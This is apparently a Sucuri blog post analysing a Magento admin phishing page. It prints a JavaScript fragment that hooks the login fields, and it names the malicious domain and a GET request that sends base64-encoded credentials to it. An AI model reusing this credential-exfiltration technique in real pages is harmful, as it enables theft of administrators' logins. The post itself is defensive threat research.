• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Magento Phishing Leverages JavaScript For Exfiltration

October 14, 2020Luke Leal

FacebookTwitterSubscribe

During a recent investigation, a Magento admin login phishing page was found on a compromised website using the file name wp-order.php. This is an odd file name choice for a Magento phishing page, but nevertheless it successfully loads a legitimate looking Magento 1.x login page.

Magento Admin Panel Phishing

What is not immediately visible or apparent to victims, however, is that the page elements like the images and CSS structure are almost all loaded from a malicious domain — orderline[.]club:

Malicious Domain

Harvesting Magento Login Credentials

For stolen data exfiltration, the phishing page uses a technique that doesn’t require a separate PHP file or rely on PHP functions to send out an email to the attacker, which is what we often find for exfiltration on phishing pages like this.

Instead, this phishing attack uses a JavaScript EventListener method (addEventListener) with the change event for the username and login (password) fields:

...
function rever() {
 try {
 document.getElementById('login').addEventListener('change', magetrack);
 } catch (err) {
 }
 try {
 document.getElementById('username').addEventListener('change', magetrack);
 } catch (err) {
 }
...

After the username and password are entered and the victim changes the page focus (e.g clicks) outside of the login fields, the phishing page automatically sends out a GET request to the URL orderline[.]club/fget.php with the stolen login data.

GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0L3dwLW9yZGVyLnBocCIsImxvZ2luIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4ifQ==

This GIF demonstrates how the GET request is sent out when someone types login data into the fields, regardless of whether they press the Login button:

Data Exfiltration

As you can see, the stolen login data is base64 encoded and sent as a query to the attacker. If you decode the base64 from the sent out GET request, then you would be left with:

{"url":"http://localhost/wp-order.php","login":"admin","pass":"admin"}

Conclusion & Mitigation Steps

The code itself seems to indicate that this phishing page is still under development by the attacker, so it’s possible we may continue to see this style of exfiltration become more popular on phishing pages in the future.

Phishing can be hard to detect, but website owners can leverage a file integrity monitoring solution to help identify indicators of compromise. Google Search Console can also come in handy to receive notifications about security problems like phishing.

If your website is exhibiting malicious behavior or you think it might have been compromised, you can follow the detailed instructions in our hacked website guide to remove the malware or reach out to our team for help with malware cleanup.

FacebookTwitterSubscribe

Categories: Ecommerce Security, Magento Security, Website SecurityTags: Black Hat Tactics, Hacked Websites, Phishing

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.